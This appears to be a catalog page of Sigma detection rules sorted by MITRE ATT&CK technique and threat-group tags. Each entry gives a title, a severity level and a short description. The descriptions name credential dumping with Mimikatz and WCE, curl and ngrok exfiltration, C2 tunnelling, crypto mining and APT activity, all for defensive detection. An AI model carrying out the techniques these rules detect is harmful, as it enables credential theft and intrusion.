  • Potential PrintNightmare Exploitation Attempt - Level: high
    Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
  • Potential Initial Access via DLL Search Order Hijacking - Level: medium
    Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
  • Windows Spooler Service Suspicious Binary Load - Level: informational
    Description: Detect DLL Load from Spooler Service backup folder
  • DLL Execution Via Register-cimprovider.exe - Level: medium
    Description: Detects using register-cimprovider.exe to execute arbitrary dll file.
  • Regsvr32 DLL Execution With Uncommon Extension - Level: medium
    Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
  • Potential Registry Persistence Attempt Via DbgManagedDebugger - Level: medium
    Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
  • Suspicious Printer Driver Empty Manufacturer - Level: high
    Description: Detects a suspicious printer driver installation with an empty Manufacturer value
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
  • Files Dropped to Program Files by Non-Priviledged Process - Level: medium
    Description: Search for dropping of files to Windows/Program Files fodlers by non-priviledged processes
attack.t1137 9
Show Rules (9)
  • New Outlook Macro Created - Level: medium
    Description: Detects the creation of a macro file for Outlook.
  • Suspicious Outlook Macro Created - Level: high
    Description: Detects the creation of a macro file for Outlook.
  • Potential Persistence Via Microsoft Office Startup Folder - Level: high
    Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
  • IE Change Domain Zone - Level: medium
    Description: Hides the file extension through modification of the registry
  • Registry Modification to Hidden File Extension - Level: medium
    Description: Hides the file extension through modification of the registry
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting - Level: high
    Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
  • Outlook Macro Execution Without Warning Setting Enabled - Level: high
    Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
  • Outlook Security Settings Updated - Registry - Level: medium
    Description: Detects changes to the registry values related to outlook security settings
  • Outlook Task/Note Reminder Received - Level: low
    Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
attack.t1071 8
Show Rules (8)
  • GALLIUM Artefacts - Level: high
    Description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  • Suspicious Installer Package Child Process - Level: medium
    Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
  • HackTool - SILENTTRINITY Stager DLL Load - Level: high
    Description: Detects SILENTTRINITY stager dll loading activity
  • HackTool - SILENTTRINITY Stager Execution - Level: high
    Description: Detects SILENTTRINITY stager use via PE metadata
  • Potentially Suspicious Rundll32.EXE Execution of UDL File - Level: medium
    Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
  • GALLIUM IOCs - Level: high
    Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
  • GALLIUM Artefacts - Builtin - Level: high
    Description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  • DNSCat2 Powershell Implementation Detection Via Process Creation - Level: high
    Description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
attack.g0010 8
Show Rules (8)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • Turla Group Named Pipes - Level: critical
    Description: Detects a named pipe used by Turla group samples
  • Turla Service Install - Level: high
    Description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
  • Turla PNG Dropper Service - Level: critical
    Description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
  • ComRAT Network Communication - Level: high
    Description: Detects Turla ComRAT network communication.
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
attack.t1115 8
Show Rules (8)
  • Clipboard Collection with Xclip Tool - Auditd - Level: low
    Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
  • Clipboard Collection of Image Data with Xclip Tool - Level: low
    Description: Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
  • Clipboard Collection with Xclip Tool - Level: low
    Description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
  • Clipboard Data Collection Via OSAScript - Level: high
    Description: Detects possible collection of data from the clipboard via execution of the osascript binary
  • PowerShell Get Clipboard - Level: medium
    Description: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.
  • Data Copied To Clipboard Via Clip.EXE - Level: low
    Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
  • PowerShell Get-Clipboard Cmdlet Via CLI - Level: medium
    Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
  • Clipboard Data Collection Via Pbpaste - Level: medium
    Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
attack.t1555 8
Show Rules (8)
  • DPAPI Backup Keys And Certificate Export Activity IOC - Level: high
    Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
  • Dump Credentials from Windows Credential Manager With PowerShell - Level: medium
    Description: Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
  • Enumerate Credentials from Windows Credential Manager With PowerShell - Level: medium
    Description: Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • HackTool - SecurityXploded Execution - Level: critical
    Description: Detects the execution of SecurityXploded Tools
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Suspicious Serv-U Process Pattern - Level: high
    Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
  • Stored Credentials in Fake Files - Level: high
    Description: Search for accessing of fake files with stored credentials
attack.t1135 8
Show Rules (8)
  • File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell - Level: high
    Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • PUA - Advanced IP Scanner Execution - Level: medium
    Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
  • PUA - Advanced Port Scanner Execution - Level: medium
    Description: Detects the use of Advanced Port Scanner.
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Potential Dridex Activity - Level: critical
    Description: Detects potential Dridex acitvity via specific process patterns
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
attack.s0005 7
Show Rules (7)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • WCE wceaux.dll Access - Level: critical
    Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Password Dumper Remote Thread in LSASS - Level: high
    Description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.
  • HackTool - Windows Credential Editor (WCE) Execution - Level: critical
    Description: Detects the use of Windows Credential Editor (WCE)
  • Windows Credential Editor Registry - Level: critical
    Description: Detects the use of Windows Credential Editor (WCE)
attack.t1212 7
Show Rules (7)
  • GALLIUM Artefacts - Level: high
    Description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  • Guacamole Two Users Sharing Session Anomaly - Level: high
    Description: Detects suspicious session with two users present
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
  • Kerberos Manipulation - Level: high
    Description: Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.
  • Suspicious NTLM Authentication on the Printer Spooler Service - Level: high
    Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
  • GALLIUM IOCs - Level: high
    Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
  • Possible Remote Password Change Through SAMR - Level: medium
    Description: Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events.
attack.t1213 7
Show Rules (7)
  • OpenCanary - GIT Clone Request - Level: high
    Description: Detects instances where a GIT service on an OpenCanary node has had Git Clone request.
  • OpenCanary - MSSQL Login Attempt Via SQLAuth - Level: high
    Description: Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
  • OpenCanary - MSSQL Login Attempt Via Windows Authentication - Level: high
    Description: Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
  • OpenCanary - MySQL Login Attempt - Level: high
    Description: Detects instances where a MySQL service on an OpenCanary node has had a login attempt.
  • OpenCanary - REDIS Action Command Attempt - Level: high
    Description: Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.
  • Bitbucket User Details Export Attempt Detected - Level: medium
    Description: Detects user data export activity.
  • Bitbucket User Permissions Export Attempt - Level: medium
    Description: Detects user permission data export attempt.
attack.t1123 7
Show Rules (7)
  • OpenCanary - SIP Request - Level: high
    Description: Detects instances where an SIP service on an OpenCanary node has had a SIP request.
  • Audio Capture - Level: low
    Description: Detects attempts to record audio with arecord utility
  • Linux Capabilities Discovery - Level: low
    Description: Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.
  • Processes Accessing the Microphone and Webcam - Level: medium
    Description: Potential adversaries accessing the microphone and webcam in an endpoint.
  • Audio Capture via PowerShell - Level: medium
    Description: Detects audio capture via PowerShell Cmdlet.
  • Audio Capture via SoundRecorder - Level: medium
    Description: Detect attacker collecting audio via SoundRecorder application.
  • Suspicious Camera and Microphone Access - Level: high
    Description: Detects Processes accessing the camera and microphone from suspicious folder
attack.t1567 7
Show Rules (7)
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
  • Suspicious Curl File Upload - Linux - Level: medium
    Description: Detects a suspicious curl process start the adds a file to a web request
  • Monero Crypto Coin Mining Pool Lookup - Level: high
    Description: Detects suspicious DNS queries to Monero mining pools
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
  • Arbitrary File Download Via ConfigSecurityPolicy.EXE - Level: medium
    Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers in order to upload or download files.
  • LOLBAS Data Exfiltration by DataSvcUtil.exe - Level: medium
    Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe
  • Potential Data Exfiltration Via Curl.EXE - Level: medium
    Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
attack.t1057 7
Show Rules (7)
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Suspicious Process Discovery With Get-Process - Level: low
    Description: Get the processes that are running on the local computer.
  • Recon Command Output Piped To Findstr.EXE - Level: medium
    Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this technique to extract specific information they require in their reconnaissance phase.
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
  • Process Discovery - Level: low
    Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
  • Suspicious Tasklist Discovery Command - Level: informational
    Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1547 7
Show Rules (7)
  • Startup/Logon Script Added to Group Policy Object - Level: medium
    Description: Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.
  • Potential RipZip Attack on Startup Folder - Level: high
    Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
  • Suspicious Driver Install by pnputil.exe - Level: medium
    Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
  • Suspicious GrpConv Execution - Level: high
    Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
  • Registry Persistence Mechanisms in Recycle Bin - Level: high
    Description: Detects persistence registry keys for Recycle Bin
  • WINEKEY Registry Modification - Level: high
    Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
  • Atbroker Registry Change - Level: medium
    Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
attack.g0049 6
Show Rules (6)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
attack.g0046 6
Show Rules (6)
  • Renamed PaExec Execution - Level: medium
    Description: Detects execution of renamed paexec via imphash and executable product string
  • Suspicious Binary In User Directory Spawned From Office Application - Level: high
    Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
  • Potential APT FIN7 Related PowerShell Script Created - Level: high
    Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
  • Potential APT FIN7 POWERHOLD Execution - Level: high
    Description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs
  • Potential POWERTRASH Script Execution - Level: high
    Description: Detects potential execution of the PowerShell script POWERTRASH
  • Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity - Level: high
    Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
attack.t1537 6
Show Rules (6)
  • AWS EC2 VM Export Failure - Level: low
    Description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.
  • AWS S3 Data Management Tampering - Level: low
    Description: Detects when a user tampers with S3 data management in Amazon Web Services.
  • AWS Snapshot Backup Exfiltration - Level: medium
    Description: Detects the modification of an EC2 snapshot's permissions to enable access from another account
  • Github Fork Private Repositories Setting Enabled/Cleared - Level: medium
    Description: Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).
  • Github Repository/Organization Transferred - Level: medium
    Description: Detects when a repository or an organization is being transferred to another location.
  • Data Exfiltration to Unsanctioned Apps - Level: medium
    Description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.
attack.t1201 6
Show Rules (6)
  • Password Policy Discovery - Linux - Level: low
    Description: Detects password policy discovery commands
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Password Policy Enumerated - Level: medium
    Description: Detects when the password policy is enumerated.
  • Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy - Level: low
    Description: Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1587 6
Show Rules (6)
  • Program Executions in Suspicious Folders - Level: medium
    Description: Detects program executions in suspicious non-program folders related to malware or hacking activity
  • Linux HackTool Execution - Level: high
    Description: Detects known hacktool execution based on image name.
  • HackTool - PurpleSharp Execution - Level: critical
    Description: Detects the execution of the PurpleSharp adversary simulation tool
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern - Level: critical
    Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
  • Suspicious Word Cab File Write CVE-2021-40444 - Level: high
    Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
  • FoggyWeb Backdoor DLL Loading - Level: critical
    Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
attack.t1529 6
Show Rules (6)
  • System Shutdown/Reboot - Linux - Level: informational
    Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
  • System Shutdown/Reboot - MacOs - Level: informational
    Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
  • Cisco Denial of Service - Level: medium
    Description: Detect a system being shutdown or put into different boot mode
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IP report
  • Suspicious Execution of Shutdown - Level: medium
    Description: Use of the commandline to shutdown or reboot windows
  • Suspicious Execution of Shutdown to Log Out - Level: medium
    Description: Detects the rare use of the command line tool shutdown to logoff a user
attack.t1496 6
Show Rules (6)
  • Linux Crypto Mining Pool Connections - Level: high
    Description: Detects process connections to a Monero crypto mining pool
  • Linux Crypto Mining Indicators - Level: high
    Description: Detects command line parameters or strings often used by crypto miners
  • Monero Crypto Coin Mining Pool Lookup - Level: high
    Description: Detects suspicious DNS queries to Monero mining pools
  • DNS Events Related To Mining Pools - Level: low
    Description: Identifies clients that may be performing DNS lookups associated with common currency mining pools.
  • Network Communication With Crypto Mining Pool - Level: high
    Description: Detects initiated network connections to crypto mining pools
  • Potential Crypto Mining Activity - Level: high
    Description: Detects command line parameters or strings often used by crypto miners
attack.t1571 6
Show Rules (6)
  • Potentially Suspicious Malware Callback Communication - Linux - Level: high
    Description: Detects programs that connect to known malware callback ports based on threat intelligence reports.
  • Suspicious DNS Z Flag Bit Set - Level: medium
    Description: The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'
  • Potentially Suspicious Malware Callback Communication - Level: high
    Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
  • Communication To Uncommon Destination Ports - Level: medium
    Description: Detects programs that connect to uncommon destination ports
  • Testing Usage of Uncommonly Used Port - Level: medium
    Description: Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.
  • Suspicious Werfault.exe Network Connection Outbound - Level: medium
    Description: Adversaries can migrate cobalt strike/metasploit/C2 beacons on compromised systems to legitimate werfault.exe process to avoid detection.
attack.t1570 6
Show Rules (6)
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
  • PSEXEC Remote Execution File Artefact - Level: high
    Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
  • Rundll32 Execution Without Parameters - Level: high
    Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
  • SMB over QUIC Via PowerShell Script - Level: medium
    Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
  • SMB over QUIC Via Net.EXE - Level: medium
    Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
attack.g0069 6
Show Rules (6)
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • CMSTP Execution Process Creation - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • CMSTP UAC Bypass via COM Object Access - Level: high
    Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
  • CMSTP Execution Registry Event - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • Potential MuddyWater APT Activity - Level: high
    Description: Detects potential Muddywater APT activity
  • MERCURY APT Activity - Level: high
    Description: Detects suspicious command line patterns seen being used by MERCURY APT
attack.t1119 5
Show Rules (5)
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • Automated Collection Command PowerShell - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
  • Recon Information for Export with PowerShell - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data
  • Automated Collection Command Prompt - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
  • Recon Information for Export with Command Prompt - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
attack.t1584 5
Show Rules (5)
  • Search-ms and WebDAV Suspicious Indicators in URL - Level: high
    Description: Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.
  • Program Executions in Suspicious Folders - Level: medium
    Description: Detects program executions in suspicious non-program folders related to malware or hacking activity
  • Suspicious External WebDAV Execution - Level: high
    Description: Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
  • Windows Update Error - Level: informational
    Description: Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.
  • WebDAV Temporary Local File Creation - Level: medium
    Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
attack.g0032 5
Show Rules (5)
  • Lazarus Activity Apr21 - Level: high
    Description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity
  • Lazarus Loaders - Level: critical
    Description: Detects different loaders as described in various threat reports on Lazarus group activity
  • Suspicious HWP Sub Processes - Level: high
    Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
  • Lazarus Group Activity - Level: critical
    Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
  • Lazarus APT DLL Sideloading Activity - Level: high
    Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
attack.t1041 5
Show Rules (5)
  • OpenCanary - TFTP Request - Level: high
    Description: Detects instances where a TFTP service on an OpenCanary node has had a request.
  • Network Communication Initiated To Portmap.IO Domain - Level: medium
    Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
  • Equation Group C2 Communication - Level: high
    Description: Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools
  • Tunneling Tool Execution - Level: medium
    Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
  • DNSCat2 Powershell Implementation Detection Via Process Creation - Level: high
    Description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
attack.t1558 5
Show Rules (5)
  • Antivirus Password Dumper Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • Replay Attack Detected - Level: high
    Description: Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client
  • HackTool - Mimikatz Kirbi File Creation - Level: critical
    Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
  • Uncommon Outbound Kerberos Connection - Level: medium
    Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
  • User with Privileges Logon - Level: low
    Description: Detects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges.
attack.t1550 5
Show Rules (5)
  • AWS STS AssumeRole Misuse - Level: low
    Description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
  • AWS STS GetSessionToken Misuse - Level: low
    Description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
  • AWS Suspicious SAML Activity - Level: medium
    Description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
  • Outgoing Logon with New Credentials - Level: low
    Description: Detects logon events that specify new credentials
  • User with Privileges Logon - Level: low
    Description: Detects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges.
attack.t1573 5
Show Rules (5)
  • Activity from Suspicious IP Addresses - Level: medium
    Description: Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.
  • Activity from Anonymous IP Addresses - Level: medium
    Description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.
  • Activity from Infrequent Country - Level: medium
    Description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.
  • Suspicious SSL Connection - Level: low
    Description: Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.
  • Potential Pikabot C2 Activity - Level: high
    Description: Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
attack.g0020 5
Show Rules (5)
  • Equation Group Indicators - Level: high
    Description: Detects suspicious shell commands used in various Equation Group scripts and tools
  • Equation Group C2 Communication - Level: high
    Description: Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools
  • Equation Group DLL_U Export Function Load - Level: critical
    Description: Detects a specific export function name used by one of EquationGroup tools
  • Potential Operation Triangulation C2 Beaconing Activity - DNS - Level: high
    Description: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
  • Potential Operation Triangulation C2 Beaconing Activity - Proxy - Level: high
    Description: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
attack.t1557 5
Show Rules (5)
  • Cisco BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing
  • Cisco LDP Authentication Failures - Level: low
    Description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
  • Huawei BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing.
  • Juniper BGP Missing MD5 - Level: low
    Description: Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
attack.t1649 5
Show Rules (5)
